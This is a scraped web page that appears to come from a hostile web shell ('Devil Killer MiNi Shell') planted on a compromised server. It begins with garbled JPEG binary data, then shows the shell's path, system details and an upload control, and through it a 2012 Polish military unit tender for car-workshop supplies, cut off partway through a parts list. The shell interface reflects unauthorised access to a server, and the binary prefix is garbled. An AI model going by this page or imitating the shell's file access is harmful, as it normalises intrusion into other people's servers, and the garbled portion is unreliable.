JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120625/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120625/218464-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa chemii warsztatowej, środków czystości, materiałów  i urządzeń wykorzystywanych w warsztacie samochodowym, materiałów eksploatacyjnych do myjni samochodowej</b><br>
<b>Numer ogłoszenia: 218464 - 2012; data zamieszczenia: 25.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1blot.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa chemii warsztatowej, środków czystości, materiałów  i urządzeń wykorzystywanych w warsztacie samochodowym, materiałów eksploatacyjnych do myjni samochodowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> zadanie 1 -  dostawa środków czystości do pojazdów
zadanie 2 - dostawa materiałów elektryczne i oświetleniowe
zadanie 3 - dostawa materiałów ściernych i eksploatacyjnych do narzędzi
zadanie 4 - dostawa środków czystości i chemii warsztatowej
zadanie 5 - dostawa materiałów eksploatacyjnych do myjni samochodowej
zadanie 6 - dostawa materiałów drobnych
zadanie 7 - dostawa materiałów malarskich
zadanie 8 - dostawa materiałów do ogumienia
zadanie 9 - dostawa materiałów spawalniczych
1. Okres gwarancji na asortyment w zadaniu nr 1 - pozycja 6 i 7 - minimum 6 miesięcy od daty dostawy
2. Okres przydatności preparatów, płynów i farb w zadaniu nr 1, 4, 5, 7 - minimum 12 miesięcy od daty dostawy
3. Wymagany dokument z pisemną gwarancją, jeżeli taki wydał producent.
Na części, dla których producent nie określa terminu gwarancji, odpowiedzialność za jakość dostarczonego towaru przejmuje Wykonawca.
4. Dostarczenie wraz z ofertą kart charakterystyki substancji niebezpiecznej do produktów chemicznych.
1) na zadanie nr 1 pozycje 1 - 4 i 8 - 9 i 11. 
2) na zadanie nr 4 pozycje 2 - 18
3) na zadanie nr 5 pozycje 3 - 6
4) na zadanie nr 7 pozycje 1 - 13
5. Dostawa sukcesywna według potrzeb Zamawiającego, maksymalnie w ciągu maksymalnie 72 godzin od pisemnego powiadomienia w formie listownej lub faxu, w okresie od daty podpisania umowy do 30.11.2012r.
6. Dostarczony przedmiot zamówienia powinien spełniać wymagania techniczne z zakresu bezpieczeństwa użytkowania, bezpieczeństwa i higieny pracy oraz być zgodny z wymaganiami producentów pojazdów (nieagresywność środków chemicznych na materiały wykorzystywane           w pojazdach)
7. Nazewnictwo użyte na fakturze za dostarczony produkt musi być bezwzględnie identyczne  z nazewnictwem użytym w umowie na dostawę.
8. Przedmiot zamówienia powinien być dostarczony w oryginalnych, nie otwieranych wcześniej opakowaniach producenta, umożliwiających dokładną identyfikację produktu, jego parametry fizyczno-techniczne i okres przydatności oraz być wyprodukowany nie wcześniej niż 12 miesięcy od daty dostawy.
9. Wykonawca zobowiązany jest podać w swojej ofercie producenta i symbol katalogowy oferowanych produktów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0, 31.68.10.00-3, 44.51.10.00-5, 24.00.00.00-4, 44.53.15.10-9, 44.53.16.00-7, 44.42.50.00-5, 44.81.21.00-6, 44.83.20.00-1, 37.41.31.60-5, 44.31.51.00-2, 24.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia- nie spełnienia w oparciu o złożone w ofercie dokumenty i oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dostarczenie wraz z ofertą kart charakterystyki substancji niebezpiecznej do produktów chemicznych.
1) na zadanie nr 1 pozycje 1 - 4 i 8 - 9 i 11. 
2) na zadanie nr 4 pozycje 2 - 18
3) na zadanie nr 5 pozycje 3 - 6
4) na zadanie nr 7 pozycje 1 - 13
Pełnomocnictwo do podpisania oferty, jeśli to nie wynika z innych dokumentów dołączonych do oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.1blot. sp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 50, pok. 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 10:00, miejsce: Jednostka Wojskowa 4198,   00-909 Warszawa ul. Żwirki i Wigury 1C, 
budynek 51,  Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa środków czystości do pojazdów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 1 -  Dostawa środków czystości do pojazdów

Lp.	Nazwa materiału	
Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1. 	Środek do konserwacji plastikowych elementów wnętrza pojazdu.	Aerozol 500-600 ml. Posiada właściwości nabłyszczające oraz antystatyczne. Różne zapachy.	szt.	250
2. 	Płyn do spryskiwaczy samochodowych letni.	Opakowanie 5 l	l.	2000
3. 	Płyn do spryskiwaczy samochodowych zimowy.	Temp. zamarzania min. -30 st.C max. -25 st. C. Opakowanie 5 l.	l.	2500
4. 	Płyn do mycia szyb samochodowych.	Opakowanie 500 ml ze spryskiwaczem. Nie wpływa negatywnie na lakier i elementy plastikowe pojazdu.	szt.	200
5. 	Zapach samochodowy choinka.	Rózne zapachy	szt.	500
6. 	Skrobaczka do szyb samochodowych ze szczotką.	Wyposażona w część do usuwania lodu, szronu oraz część miękką do ściągania wody. Szerokość części roboczej min. 10 cm max. 15 cm.
Rękojeść o długości od 15 cm, wyposażona w poręczny, miękki dla dłoni uchwyt.
Po przeciwnej stronie części roboczej szczotka do zamiatania śniegu	szt.	150
7. 	Ściągaczka do wody.	Część ściągająca wodę o dł. min 25 cm, gumowa rękojeść.	szt.	100
8. 	Odmrażacz do szyb samochodowych.	Opakowanie 200-250 ml.	szt.	200
9. 	Odmrażacz do zamków samochodowych w aerozolu.	Opakowanie 50 ml.	szt.	200
10. 	Gąbka z irchy naturalnej.    	Prostopadłościan o wymiarach 110x80x40 mm (+/- 10 mm).	szt.	200
11. 	Preparat do mycia tapicerki.	Opakowanie w areozolu o pojemnosci 250 do 300 ml)	szt.	150
12. 	Ścierka ircha	Wymiary 300x500 mm, +/- 10 mm.	szt.	200
13. 	Zapach Ambi Pur	10x wanilia, 10x morski	szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.80.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów elektrycznych i oświetleniowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 2 - Dostawa materiałów elektrycznych i oświetleniowych


Lp.	Nazwa materiału	
Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1.	Końcówka konektorowa elektryczna żeńska		szt.	500
2.	Końcówka konektorowa elektryczna męska		szt.	500
3.	Końcówka elektryczna oczkowa o 4		szt.	200
4.	Końcówka elektryczna oczkowa o 5		szt.	200
5.	Końcówka elektryczna oczkowa o 6		szt.	200
6.	Końcówka elektryczna oczkowa o 8		szt.	200
7.	Końcówka elektryczna oczkowa o 10		szt.	200
8.	Końcówka elektryczna oczkowa M10A		szt.	200
9.	Koszulki termokurczliwe śred. 6mm	1 m długości	szt.	150
10.	Koszulki termokurczliwe śred. 4mm	1 m długości	szt.	150
11.	Koszulki termokurczliwe śred. 2mm 	1 m długości	szt.	150
12.	Taśma izolacyjna	różne kolory, szer. 2,5 cm, dł. 20m.	szt.	100
13.	Przewód elektryczny jednożyłowy fi 1,5	4 różne kolory, każdy po 100 m	m	400
14.	Przewód elektryczny 7 żyłowy		m	50
15.	Bezpiecznik płytkowy mini 7,5 A		szt.	100
16.	Bezpiecznik płytkowy mini 10 A		szt.	100
17.	Bezpiecznik płytkowy mini 15 A		szt.	100
18.	Bezpiecznik płytkowy mini 20 A		szt.	100
19.	Bezpiecznik topikowy 8A		szt.	50
20.	Bezpiecznik topikowy 16A		szt.	50
21.	Bezpiecznik topikowy 25A		szt.	50
22.	Żarówka 12V 1,2W bezcokołowa		szt.	50
23.	Żarówka 12V 5W bezcokołowa		szt.	100
24.	Żarówka 12V 5W rurkowa		szt.	100
25.	Żarówka 12V 55W H-7		szt.	200
26.	Żarówka 12V 60-55W H-4		szt.	50
27.	Żarówka 12V 15W		szt.	50
28.	Żarówka 12V 21W		szt.	200
29.	Żarówka 12V 21W pomarańczowa		szt.	50
30.	Żarówka 12V 21-5W		szt.	100
31.	Żarówka 12V 2W		szt.	100
32.	Żarówka 24V 5W		szt.	100
33.	Żarówka 24V 2W		szt.	100
34.	Żarówka 24V 1,2W bezcokołowa		szt.	100
35.	Żarówka 24V 20W halogenowa		szt.	50
36.	Żarówka 24V 3W bezcokołowa		szt.	50
37.	Wtyczka elektryczna przewodu 230V		szt.	10
38.	Świetlówka 11W-840-2P	Barwa światła 840 - biała 4000k Trwałość do 8000h, strumień świetlny lm - 600, trzonek - G23, ilość pinów 2	szt.	10
39.	Kostka żarówki H4		szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.68.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa materiałów ściernych i eksploatacyjnych do narzędzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 3 - Dostawa materiałów ściernych i eksploatacyjnych do narzędzi

Lp.	Nazwa materiału	
Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1.	Płutno ścierne gr. 40	granulacja 40	szt.	100
2.	Krążek ścierny samoprzylepny o 150 gr.60	granulacja 60	szt.	200
3.	Krążek ścierny samoprzylepny o 150 gr.80	granulacja 80	szt.	200
4.	Krążek ścierny samoprzylepny o 150 gr.120	granulacja 120	szt.	200
5.	Krążek ścierny samoprzylepny o 150 gr.180	granulacja 180	szt.	200
6.	Krążek ścierny samoprzylepny o 150 gr.240	granulacja 240	szt.	200
7.	Tarcza do cięcia stali 115 x 1 x 22.2 mm		szt.	200
8.	Tarcza do szlifowania 115 x 6 x 22.2 mm		szt.	100
9.	Tarcza do szlifowania 230 x 6 x 22.2 mm		szt.	100
10.	Tarcza ścierna do metali twardych 125x16x12,7 mm		szt.	2
11.	Tarcza szlifierska diamentowa boczna 200x32x16 mm		szt.	1
12.	Końcówka do smarownicy nożnej	prosta, czteroszczękowa M10x1	szt.	20
13.	Trzonek młotka 6 kg		szt.	10
14.	Szczotka druciana sześciorzędowa		szt.	100
15.	Szyba wziernikowa MHG 	do piaskarki SMG 45-1-S-1-085-0603-075	szt.	2
16.	Folia ochronna szyby wziernikowej                      przylepna	do piaskarki SMG 45-1-S-1-085-0603-075, wymiary 495x315 mm	szt.	10
17.	Szczotka na taśmie drobna do szlifierki WURTH DBS 3500	nr produktu A0703 350 3 Średnica tasmy 55 mm	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.51.10.00-5, 44.17.40.00-0, 39.22.42.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa środków czystości i chemii warsztatowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 4 - Dostawa środków czystości i chemii warsztatowej

Lp.	Nazwa materiału	
Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1.	Czyściwo warsztatowe celulozowe 	opakowania po 2 rolki, wymiary od 24 cm x 230 mb do 25 cm x 240 mb,    2 klejone warstwy	opak.	200
2.	Preparat WD-40	Opakowanie 400 ml	szt.	150
3.	Smar półtłusty HSW 100	Opakowanie 500 ml w sprayu	szt.	15
4.	Smar półtłusty HHS 2000	Opakowanie 500 ml w sprayu	szt.	15
5.	Klej szybkoschnący	Opakowanie 2 ml. Do metalu, gumy, szkła, plastiku, drewna, itp.
Klej na bazie cyjanoakrylanu	szt.	30
6.	Silikon uniwersalny czarny	Opakowanie 310 ml	szt. 	30
7.	Spray do dysz migomatu	Opakowanie 400 ml	szt.	10
8.	Baranek czarny w sprayu	Opakowanie 500 ml	szt.	40
9.	Klej butapren	Opakowanie 40 ml	szt.	20
10.	Cynk galwaniczny w sprayu	Opakowanie 400 ml	szt.	30
11.	Preparat do konserwacji biegunów akumulatora	Opakowanie 150 ml w sprayu	szt.	30
12.	Preparat do pasków klinowych	Opakowanie 400 ml w sprayu	szt.	20
13.	Preparat do układów elektrycznych	Opakowanie 200 ml w sprayu	szt.	20
14.	Pasta polerska G-3	opakowanie 400 ml	szt.	5
15.	Pasta montażowa do tłumików	opakowanie 200 g	szt.	10
16.	Miedź w sprayu	opakowanie 400 ml	szt.	15
17.	Płynny metal klej		szt.	3
18.	Zmywacz do hamulców	opakowanie 5 l	szt.	20.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.00.00.00-4, 24.95.11.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa materiałów eksploatacyjnych do myjni samochodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 5 - Dostawa materiałów eksploatacyjnych do myjni samochodowej

Lp.	Nazwa materiału	
Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1.	Filtr recyklingu	do oczyszczalni Karcher HDR 777 nr produktu 6.286-359	szt.	4
2.	Worek filtra	do oczyszczalni Karcher HDR 777 nr produktu 6.286-358.0	szt.	4
3.	Płyn RM 110		l.	60
4.	Płyn myjący RM 69 ASF		l.	150
5.	Płyn uniwersalny RM 81 ASF		l.	350
6.	Wosk RM 824 ASF		l.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.91.35.00-4, 24.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa materiałów drobnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE 6 - Dostawa materiałów drobnych

Lp.	Nazwa materiału	Opis przedmiotu zamówienia	j.m.	Ilość dostawy
1.	Śruba M5x25	z gwintem częściowym	kg	2
2.	Śruba M5x35	z gwintem częściowym	kg	2
3.	Śruba M6x30	z gwintem częściowym	kg	2
4.	Śruba M6x40	z gwintem częściowym	kg	2
5.	Śruba M8x25	z gwintem częściowym	kg	2
6.	Śruba M8x45	z gwintem częściowym	kg	2
7.	Śruba M8x60	z gwintem częściowym	kg	2
8.	Śruba M8x80	z gwintem częściowym	kg	2
9.	Śruba M10x45	z gwintem częściowym	kg	2
10.	Śruba M10x60	z gwintem częściowym	kg	2
11.	Śruba M10x90	z gwintem częściowym	kg	2
12.	Śruba M12x45	z gwintem częściowym	kg	2
13.	Śruba M12x60	z gwintem częściowym	kg	2
14.	Śruba M12x90	z gwintem częściowym	kg	2
15.	Śruba M14x45	z gwintem częściowym	kg	2
16.	Śruba M14x60	z gwintem częściowym	kg	2
17.	Śruba M14x90	z gwintem częściowym	kg	2
18.	Śruba M16x50	z gwintem częściowym	kg	2
19.	Śruba M16x70	z gwintem częściowym	kg	2
20.	Śruba M5x25	z gwintem pełnym	kg	2
21.	Śruba M5x35	z gwintem pełnym	kg	2
22.	Śruba M6x30	z gwintem pełnym	kg	2
23.	Śruba M6x40	z gwintem pełnym	kg	2
24.	Śruba M8x25	z gwintem pełnym	kg	2
25.	Śruba M8x45	z gwintem pełnym	kg	2
26.	Śruba M8x60	z gwintem pełnym	kg	2
27.	Śruba M8x80	z gwintem pełnym	kg	2
28.	Śruba M10x45	z gwintem pełnym	kg	2
29.	Śruba M10x60	z gwintem pełnym	kg	2
30.	Śruba M10x90	z gwintem pełnym	kg	2
31.	Śruba M12x45	z gwintem pełnym	kg	2
